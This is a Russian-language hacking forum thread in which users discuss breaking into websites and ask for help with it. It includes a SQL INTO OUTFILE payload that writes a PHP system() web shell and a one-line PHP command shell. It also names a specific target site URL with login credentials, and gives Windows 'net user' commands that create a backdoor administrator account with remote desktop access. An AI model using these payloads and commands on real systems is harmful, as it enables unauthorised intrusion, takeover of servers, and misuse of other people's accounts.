выложить можно , но опасно и не буду, ибо там все просто, надо тока знать имя папки получается,и умееш ли ты с ним работать?
хм. /ru/admin /em/admin не открывает ,хотя маднет кричит что они есть =) а как ни странно en/admin,которой в маднете нет, выдаёт окно для ввода логина/паса,но она запаролена просвети,буду уметь работать )
Я что-то не пойму, РОА заняться нечем что-ли? В правилах темы написано по русски что шеллы в паблике запрещены, мы их долго тереть будем?
Фото альбомы > > Дата: 01.01.1970 Добавлено: Размер: x пикселов Warning: filesize() [function.filesize]: stat failed for images/photoalbum/album_/ in /home/gamer/public_html/photogallery.php on line 68 Рахмер файла: Bytes Комментариев: 0 Рейтинг: Пусто Количество просмотров: Посмотрите есть тут что плз P.S Ногами не пинать, я чайничек)
Залил на сайт шелл, но доступ к индексу и другим файлам не имею,то есть не могу удалить,редак. и др. чмод 666, меняю на 777 - не меняется, помогите пж. спс.
да-да сейчас я покажу свои экстрасенсорные способности и угадаю сайт!!! У тебя тут есть путь, ты доволен???
тссс успокойся Вот посмотри пожалуйста http://la2.sz.ru/photogallery.php?photo_id=1 Вот пользователь для проверки: логин: caak111 пароль: 1q2w3e4r
SQL - пользователь root не имеет пароля. Так же, как и через инъект... Code: SELECT '<?=system($_GET["cmd"])>' FROM table_name INTO OUTFILE '/var/www/shell.php'
Люди , ситауция - залил через скуль шел на сайт . сайт под виндовс . при создании файла с содержимым - "<?php system($_GET['cmd']); ?>" и вызовом функции site.com/cmd.php?cmd=dir ничего не отображается..что же делать ? как по рутать .. Есть доступ и права на запись ко всему диску С: думал сделать нечто такое -- net user Attacker 12345 /add net localgroup Administrators Attacker /add net localgroup Remotedesktopuser Attacker /add ,.. но вот не задача цмд не работает ..Что делоть?